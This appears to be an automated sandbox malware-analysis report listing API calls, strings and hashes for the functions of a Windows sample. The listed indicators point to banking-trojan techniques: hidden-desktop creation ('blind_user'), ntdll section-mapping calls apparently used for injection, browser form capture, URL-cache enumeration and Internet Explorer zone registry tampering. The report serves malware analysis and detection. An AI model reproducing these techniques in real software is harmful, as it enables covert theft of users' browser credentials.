                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandleProcessSleepThreadstrcat$CreateCurrentDeleteDesktopFileFreeLocalTerminateTextWindowmemsetsprintf
                            • String ID: %s%u - Microsoft Internet Explorer$D$MicroSoft-Corp$X-okRecv11$\Iexplore.exe
                            • API String ID: 1202517094-2261298365
                            • Opcode ID: e98e409644201e6de021147ee2f0c1805f35588af9548cc9b8076052c01221a7
                            • Instruction ID: a5954b523feb805065d44168e487e19d6cbd8b1c6e851fe6a795fce517e83f05
                            • Opcode Fuzzy Hash: e98e409644201e6de021147ee2f0c1805f35588af9548cc9b8076052c01221a7
                            • Instruction Fuzzy Hash: 4F416572E442186ADB20AA65CC46BDDB3B99F50305F1444F7E208F61D1DABCAEC48F59
                            Function 00401B9F Relevance: 26.7, APIs: 11, Strings: 4, Instructions: 487memoryCOMMON
                            Download Yara Rule
                            APIs
                            • SysAllocString.OLEAUT32(value), ref: 00401BCC
                              • Part of subcall function 004017AC: CoInitialize.OLE32(00000000), ref: 004017CC
                              • Part of subcall function 004017AC: CLSIDFromString.OLE32({9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 004017DA
                              • Part of subcall function 004017AC: CoCreateInstance.OLE32(?,00000000,?,0042CD50,?,{9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 00401803
                            • _sleep.CRTDLL(00000000), ref: 00401BFD
                            • GetForegroundWindow.USER32(00000000), ref: 00401C02
                              • Part of subcall function 0040185F: GetWindowTextA.USER32(?,?,?), ref: 004018E2
                            • memcpy.CRTDLL(00418F40,?,?), ref: 00401D6D
                            • memcpy.CRTDLL(?,00418F40,?), ref: 00401F34
                            • _sleep.CRTDLL(00000000), ref: 00401F4A
                            • sprintf.CRTDLL(?,%s FORM_%X,?,?,00000000), ref: 00401F77
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: StringWindow_sleepmemcpy$AllocCreateForegroundFromInitializeInstanceTextsprintf
                            • String ID: %s %X%c$%s FORM_%X$%s%c$value
                            • API String ID: 3510745994-3693252589
                            • Opcode ID: 97066158e7caddc246d118ad30601bc5e86c518a965b60cc81196b9f5f35fe85
                            • Instruction ID: 207a0c2c24704257dc82047f11ad41d7b25eba1db427a6dda8aff0efe7f4a5ef
                            • Opcode Fuzzy Hash: 97066158e7caddc246d118ad30601bc5e86c518a965b60cc81196b9f5f35fe85
                            • Instruction Fuzzy Hash: 2112DC71A002199FDB62DB68CD44BDAB7F9BB0C304F5040FAA588E7290D7B4AAC58F55
                            Function 00402822 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 34libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleA.KERNEL32(ntdll.dll,00000000,69D467A1,00402E1B,00000000,69D467A1,?,?,00406F1E,00000000,00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll), ref: 0040283A
                            • GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 00402847
                            • GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 00402857
                            • GetProcAddress.KERNEL32(00000000,NtOpenSection), ref: 0040286D
                            • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 0040287D
                            • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 0040288D
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$HandleModule
                            • String ID: NtMapViewOfSection$NtOpenSection$NtUnmapViewOfSection$RtlInitUnicodeString$RtlNtStatusToDosError$ntdll.dll
                            • API String ID: 667068680-1987783197
                            • Opcode ID: f3f948102971a568e61a5bb1a738835a59e2c1009918de6079867c1c535b5a8b
                            • Instruction ID: 9d3c92be313ac2760b75685e9acc68d9338f811418752029c31410863af0f615
                            • Opcode Fuzzy Hash: f3f948102971a568e61a5bb1a738835a59e2c1009918de6079867c1c535b5a8b
                            • Instruction Fuzzy Hash: BCF03A21B642206B93126B327D4293E36689792B19395003FF840F6191DB7C09225F9F
                            Function 00402E06 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 337libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00402822: GetModuleHandleA.KERNEL32(ntdll.dll,00000000,69D467A1,00402E1B,00000000,69D467A1,?,?,00406F1E,00000000,00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll), ref: 0040283A
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 00402847
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 00402857
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtOpenSection), ref: 0040286D
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 0040287D
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 0040288D
                            • GetVersion.KERNEL32 ref: 00402E22
                            • LoadLibraryA.KERNEL32 ref: 00402E91
                            • GetProcAddress.KERNEL32 ref: 00402EC5
                            • IsBadReadPtr.KERNEL32(?,00001000), ref: 00402F75
                            • GlobalMemoryStatus.KERNEL32(?), ref: 00402F9F
                            • CloseHandle.KERNEL32(?), ref: 00403065
                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004030EA
                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040315B
                            • IsBadWritePtr.KERNEL32(00000000,00001000), ref: 004031F1
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Handle$Module$CloseGlobalLibraryLoadMemoryQueryReadStatusVersionVirtualWrite
                            • String ID: kernel32.dll
                            • API String ID: 2089743848-1793498882
                            • Opcode ID: 4f42c9a603f3b22a608ddecb7cf3016b4a0286024c9d1ec82fce5a6e54f44313
                            • Instruction ID: cfd5926590b061e949c3a24607155209ead47d6dc4f6dfca132d0ef3b1a5cdf0
                            • Opcode Fuzzy Hash: 4f42c9a603f3b22a608ddecb7cf3016b4a0286024c9d1ec82fce5a6e54f44313
                            • Instruction Fuzzy Hash: F6F19070D042B88BEB328F64DD483E9BBB1AB55306F0481EBD588662D2C2B85FC5CF55
                            Function 004037AA Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 53COMMON
                            Download Yara Rule
                            APIs
                            • printf.CRTDLL([length=%i] [summ=%i],?,00000000), ref: 004037DD
                            • printf.CRTDLL(HEX: ,[length=%i] [summ=%i],?,00000000), ref: 004037EE
                            • printf.CRTDLL(%02X ,00000000), ref: 00403804
                            • printf.CRTDLL(TXT: '%s',?), ref: 0040382C
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: printf
                            • String ID: TXT: '%s'$%02X $HEX: $X4$[length=%i] [summ=%i]
                            • API String ID: 3524737521-4004101572
                            • Opcode ID: ca4ded32e23903f7249d6c5dbeb3a47121f77b3b45ed42eb0d7ff3160f68b428
                            • Instruction ID: a8ef6db4a05ad48ab0456940bf437e850f92713de92630681f76b68ebadef0f7
                            • Opcode Fuzzy Hash: ca4ded32e23903f7249d6c5dbeb3a47121f77b3b45ed42eb0d7ff3160f68b428
                            • Instruction Fuzzy Hash: 88016B62A04254BED7006FA7CC82A6F7FDCAB4175AF2080BEF545730C0D1B86F41D6A6
                            Function 004054D7 Relevance: 15.1, APIs: 10, Instructions: 109stringthreadmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 004054F1
                            • lstrlenA.KERNEL32(?,?), ref: 00405505
                            • lstrlenA.KERNEL32(?,?,?), ref: 00405513
                            • lstrlenA.KERNEL32(?,?,?,?), ref: 0040551F
                            • LocalAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0040554B
                            • memcpy.CRTDLL(00000001,?,?,00000000,?,?,?,?,?), ref: 0040556A
                            • CreateThread.KERNEL32(00000000,00000000,Function_00005133,00000000,00000000,?), ref: 004055DE
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?,-00000005,?), ref: 004055EE
                            • GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?), ref: 004055F8
                            • CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006), ref: 004055FE
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Thread$AllocCloseCodeCreateExitHandleLocalObjectSingleWaitmemcpy
                            • String ID:
                            • API String ID: 2845097592-0
                            • Opcode ID: 7ec933356805a86d395f76af41b9b2d9f18e99f1d3eeeb5c371ae48cad7448a7
                            • Instruction ID: 017c82820a2f145177c9e28e2e3f5c0bebc6ad2cdfe5315ab2aa4ad5daf85086
                            • Opcode Fuzzy Hash: 7ec933356805a86d395f76af41b9b2d9f18e99f1d3eeeb5c371ae48cad7448a7
                            • Instruction Fuzzy Hash: 5E31D721A04159BACF01DFA6CC01AAEB7F9AF44318F144476F904E7291E63CDB15C7A9
                            Function 00405F5B Relevance: 13.6, APIs: 9, Instructions: 64stringthreadmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405F73
                            • lstrlenA.KERNEL32(?,?), ref: 00405F7E
                            • LocalAlloc.KERNEL32(00000040,?,?,?), ref: 00405F8D
                            • lstrlenA.KERNEL32(?,00000000,?,00000040,?,?,?), ref: 00405FA2
                            • DeleteUrlCacheEntry.WININET(?), ref: 00405FB5
                            • CreateThread.KERNEL32(00000000,00000000,Function_00005C09,00000000,00000000,?), ref: 00405FCA
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040,?,?), ref: 00405FDD
                            • GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040), ref: 00405FE7
                            • CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?), ref: 00405FED
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Thread$AllocCacheCloseCodeCreateDeleteEntryExitHandleLocalObjectSingleWait
                            • String ID:
                            • API String ID: 794401840-0
                            • Opcode ID: 03fc3e79f5e594bfaf1f893bda151e66fa8c5b5e213fcd764589a016d7372ae4
                            • Instruction ID: 5ee1198a60b0fc2a8532ff5616a25e8349e08cf473eab22e95dc85017e90c3ca
                            • Opcode Fuzzy Hash: 03fc3e79f5e594bfaf1f893bda151e66fa8c5b5e213fcd764589a016d7372ae4
                            • Instruction Fuzzy Hash: B011CA71A082447BD701F6668C42EAFB76DDF85368F144476F600B71C2D678AF0147E9
                            Function 0040289A Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 99COMMON
                            Download Yara Rule
                            APIs
                            • GetSecurityInfo.ADVAPI32(?,00000006,?,00000000,00000000,?,00000000,?), ref: 00402976
                            • SetEntriesInAclA.ADVAPI32(00000001,00000002,?,?), ref: 00402988
                            • SetSecurityInfo.ADVAPI32(?,00000006,?,00000000,00000000,?,00000000,?,00000006,?,00000000,00000000,?,00000000,?), ref: 004029A3
                            • CloseHandle.KERNEL32(?,?,00000006,?,00000000,00000000,?,00000000,?,00000006,?,00000000,00000000,?,00000000,?), ref: 004029B1
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: InfoSecurity$CloseEntriesHandle
                            • String ID: @$CURRENT_USER$\device\physicalmemory
                            • API String ID: 405656561-3357994103
                            • Opcode ID: 3f106b48de9bb5ba9ca254209248b2c107f34978da584956db3145db2ea5644b
                            • Instruction ID: 89d45d45e0a184fa7970b295066ffccd564a705ae1855cc5323f3f658fcd5c06
                            • Opcode Fuzzy Hash: 3f106b48de9bb5ba9ca254209248b2c107f34978da584956db3145db2ea5644b
                            • Instruction Fuzzy Hash: 2A41EB71E4030DAFEB108FD4DC85BEEB7B9FB04319F50403AEA00BA191D7B9595A8B59
                            Function 0040509B Relevance: 12.0, APIs: 1, Strings: 7, Instructions: 43COMMON
                            Download Yara Rule
                            APIs
                            • sprintf.CRTDLL(?,SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u,00000000), ref: 004050CD
                            Strings
                            • Software\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 004050FF
                            • SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u, xrefs: 004050C1
                            • yes, xrefs: 0040510E
                            • BrowseNewProcess, xrefs: 00405113
                            • GlobalUserOffline, xrefs: 004050FA
                            • 1601, xrefs: 004050D4
                            • .DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess, xrefs: 00405118
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: sprintf
                            • String ID: .DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess$1601$BrowseNewProcess$GlobalUserOffline$SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u$Software\Microsoft\Windows\CurrentVersion\Internet Settings$yes
                            • API String ID: 590974362-546450379
                            • Opcode ID: ad57bd7a5e5ee7174c091d0a3ea72984deb32bb5560bbbda773b8a609c7be674
                            • Instruction ID: cd0aaffbc0bd71aa605591c0976343fec0ffbebd6d6d4fedce8ce2f9217411d7
                            • Opcode Fuzzy Hash: ad57bd7a5e5ee7174c091d0a3ea72984deb32bb5560bbbda773b8a609c7be674
                            • Instruction Fuzzy Hash: 24F07DF2F883587EE710A1699C47F8D765907A1704FA400A7BA44B10C2D0FE56C6826D
                            Function 004077E4 Relevance: 10.6, APIs: 7, Instructions: 83windowCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Focus$CallProcWindow
                            • String ID:
                            • API String ID: 2401821148-0
                            • Opcode ID: 92e1ce8f7ee7a46a278bda77c005b4e0a5389e500612bd3ca87d360d572643d3
                            • Instruction ID: 67d25c2989ca0d32993d4aa71a0b11dc39683739a3ff9c0c7d6bcfde353c753a
                            • Opcode Fuzzy Hash: 92e1ce8f7ee7a46a278bda77c005b4e0a5389e500612bd3ca87d360d572643d3
                            • Instruction Fuzzy Hash: 6F318233E082149BDF21FB29ED848DA7726A751324715C43AE550B32B1DB787C91CB6E
                            Function 004036B3 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 004036D7
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 004036F4
                            • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403715
                            • WriteFile.KERNEL32(00000000,0042CC6C,00000002,?,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000), ref: 00403728
                            • CloseHandle.KERNEL32(00000000,00000000,0042CC6C,00000002,?,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?), ref: 00403734
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Write$CloseCreateHandlePointer
                            • String ID: Y&-v
                            • API String ID: 2529654636-852306816
                            • Opcode ID: 1a2ee31b6e64b1819939f0b424d9492dfa5bc2d8a36479f3b8c11624ee1f3d36
                            • Instruction ID: 393fb1fac6dfb6d7043d4134058e676a256c67ba5a84656a07003a75d011006f
                            • Opcode Fuzzy Hash: 1a2ee31b6e64b1819939f0b424d9492dfa5bc2d8a36479f3b8c11624ee1f3d36
                            • Instruction Fuzzy Hash: A401A772B4461439F62165758C43F9E365D8B41B78F208136F711BB1C1D6F97E0142BD
                            Function 00405613 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78COMMON
                            Download Yara Rule
                            APIs
                            • FindFirstUrlCacheEntryA.WININET(*.*,?,00001F40), ref: 00405654
                            • _stricmp.CRTDLL(?,?), ref: 00405679
                            • FindNextUrlCacheEntryA.WININET(00000000,?,00001F40), ref: 004056C0
                            • _stricmp.CRTDLL(?,?), ref: 004056D6
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CacheEntryFind_stricmp$FirstNext
                            • String ID: *.*
                            • API String ID: 747601842-438819550
                            • Opcode ID: ba5afd5151c0520d6d715a10c5df759dc41a82144f0bc2f8a3a4ef8e8a54dfaf
                            • Instruction ID: aa6d97de36eacb02400b0bc5d5be45fc0d4f636131057f9c0ab70f2a458f06eb
                            • Opcode Fuzzy Hash: ba5afd5151c0520d6d715a10c5df759dc41a82144f0bc2f8a3a4ef8e8a54dfaf
                            • Instruction Fuzzy Hash: AD21CF72E1005AABCB109A65CC018FBB6EEEB44398F1404F3F108F7290EB799E418F65
                            Function 0040431F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50threadCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentThreadId.KERNEL32 ref: 00404341
                            • GetThreadDesktop.USER32(00000000), ref: 00404347
                            • CreateDesktopA.USER32(blind_user,00000000,00000000,00000000,000000C7,00000000), ref: 00404376
                            • SetThreadDesktop.USER32 ref: 00404394
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: DesktopThread$CreateCurrent
                            • String ID: blind_user
                            • API String ID: 2384851093-487808672
                            • Opcode ID: f5dbc74db38e7769b0145d7bd92762358955ae931e1e69e9e23be6df9a4e239d
                            • Instruction ID: 282a6fb7077f79b337956a50597d570250b08ff90f4541f666399335e01d3b83
                            • Opcode Fuzzy Hash: f5dbc74db38e7769b0145d7bd92762358955ae931e1e69e9e23be6df9a4e239d
                            • Instruction Fuzzy Hash: 2C018471B442006FDB14B73E9C5276FA6D95BC0314F64403BA602F72D0E9B899018A5D
                            Function 00403840 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
